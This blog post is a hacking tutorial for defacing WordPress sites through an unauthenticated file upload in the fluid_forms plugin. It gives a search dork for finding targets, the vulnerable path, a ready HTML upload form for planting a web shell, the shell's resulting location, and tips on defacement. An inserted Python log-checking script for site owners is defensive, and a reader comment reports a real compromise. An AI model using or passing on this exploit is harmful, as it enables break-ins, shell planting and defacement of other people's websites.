Tutorial Deface WordPress Fluid_forms Upload Vulnerability

11:09 PM
For today's article I will share the WordPress Fluid_forms Upload Vulnerability exploit. This exploit is fairly old, but I'm posting it just for fun; who knows, maybe it still works *AWKAKWKAKW
This exploit is in the same family as the FormCraft one; please read Tutorial Deface Wordpress Plugins FromCraft Upload.
Haha, this is the first post of February 2016 on this blog. *eww, the opening post from me :p haha
Sorry I only just got around to posting; my speedol *er, Speedy connection has been acting up lately awkakwkwa :v [just kidding]


On to the tutorial ;*
Edited By: OepilCore


#We Are Cyber Penetrate from SlemanCity!
#Official member: Sinkaroid & Seringhai
#Author: Jangene Cakep | Sinkaroid | Incef-Team ft. Sanjungan Jiwa
#Dork: inurl:fluid_forms
#Exploit & Vulnerability: /wp-content/plugins/fluid_forms/file-upload/server/php/
#Type: CSRF & Xampp ,Uploadify
#Tested:Windows XP, 7, 8, Backbox 

#CMS:WordPress
----

Dork: inurl:fluid_forms
(For the rest, use your imagination, so you find ones that are vuln and untouched)

Exploit: /wp-content/plugins/fluid_forms/file-upload/server/php/

1. Enter the dork into the Google search box
2. Pick a target, then append the exploit path. Example:
target.co.li/wp-content/plugins/fluid_forms/file-upload/server/php/

3. If it is vulnerable, the page will change to look like this


that's roughly what it looks like :'v

CSRF:
<form method="POST" action="http://target.co.li/wp-content/plugins/fluid_forms/file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

* replace target.co.li -> the URL of your target site
* save as: .html

4. Once that is done, open the CSRF file in your web browser, then upload the file/shell you want to upload to the target site :p



5. If your file/shell was uploaded to the target site successfully, something like this picture will appear:


the location of your file/shell will be shown :p

6. Shell access: /wp-content//plugins//fluid_forms/file-upload/server/php/files/shellname.php

done xD ~ xixihi
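
For site owners, the requests in steps 4 to 6 show up in the web server access log as a POST to the upload handler followed by a request for a script under its files/ directory. The Python check below is an added example, not part of the original post; it assumes the Apache/nginx "combined" log format, and the function names, extension list and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Upload handler path taken from the post; everything else here is an assumption.
UPLOAD_DIR = "/wp-content/plugins/fluid_forms/file-upload/server/php/"
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")
# Combined log format: ip - - [time] "METHOD path proto" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')

def normalise(raw_path):
    """Drop the query string, decode %-escapes and collapse repeated slashes,
    so /wp-content//plugins//fluid_forms/... matches the same rule."""
    path = unquote(raw_path.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def find_upload_abuse(lines):
    """Return findings as (kind, ip, time, path) tuples.
    'upload'       : POST to the upload handler answered with 2xx
    'script_fetch' : script inside its files/ directory served with 2xx"""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, when, method, raw_path, status = m.groups()
        if not status.startswith("2"):
            continue  # blocked or missing: nothing was accepted or served
        path = normalise(raw_path)
        if method == "POST" and path == UPLOAD_DIR:
            findings.append(("upload", ip, when, path))
        elif path.startswith(UPLOAD_DIR + "files/") and path.endswith(SCRIPT_EXT):
            findings.append(("script_fetch", ip, when, path))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
BASE = "/wp-content/plugins/fluid_forms/file-upload/server/php/"
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Feb/2016:23:01:10 +0700] "GET %s HTTP/1.1" 200 2 "-" "-"' % BASE,
    '203.0.113.7 - - [02/Feb/2016:23:02:41 +0700] "POST %s HTTP/1.1" 200 310 "-" "-"' % BASE,
    '203.0.113.7 - - [02/Feb/2016:23:03:05 +0700] "GET /wp-content//plugins//fluid_forms'
    '/file-upload/server/php/files/shellname.php HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.4 - - [02/Feb/2016:23:04:00 +0700] "GET %sfiles/photo.jpg HTTP/1.1" 200 9000 "-" "-"' % BASE,
    '198.51.100.9 - - [02/Feb/2016:23:05:00 +0700] "POST %s HTTP/1.1" 403 199 "-" "-"' % BASE,
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding, sep="  ")
```

A 'script_fetch' finding means the server returned a script from the upload directory, which is the point at which the site should be treated as compromised and the directory checked for files that do not belong there.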


Now, once you are in the shell, it's up to you what you do with it, dissect it down to its guts if you like.

If you want to deface, I suggest just dropping a file; if you want to overwrite the index (DON'T FORGET TO BACK IT UP, DAMN IT :) ))



Gane aned ;*

Easy, right o.O ?
Stay Cool and Keep ./Crotz, guys :'v

If there are any mistakes, please forgive them and correct them in the comments.
If you have any criticism or questions, go straight to our fan page wall: TKJ CYBER ART
I only meant to share a tutorial, with the aim of helping beginners like me :')

Happy WordPress Hacked !!
That's all, and I hope it's useful .. thank you

2 comments

  1. Hello friend, everything that you have described in this article just happened to me, with the aggravating circumstance that I did not read it when I noticed that something strange was happening. The directory is the same as you describe but apparently it was installed in a plugin wp_hosting_performance_check / css. Now it seems that he has taken control of the entire site. It uninstalled all the plugins and it does not let me modify any file. You want to tell me what can I do?

  2. This comment has been removed by the author.
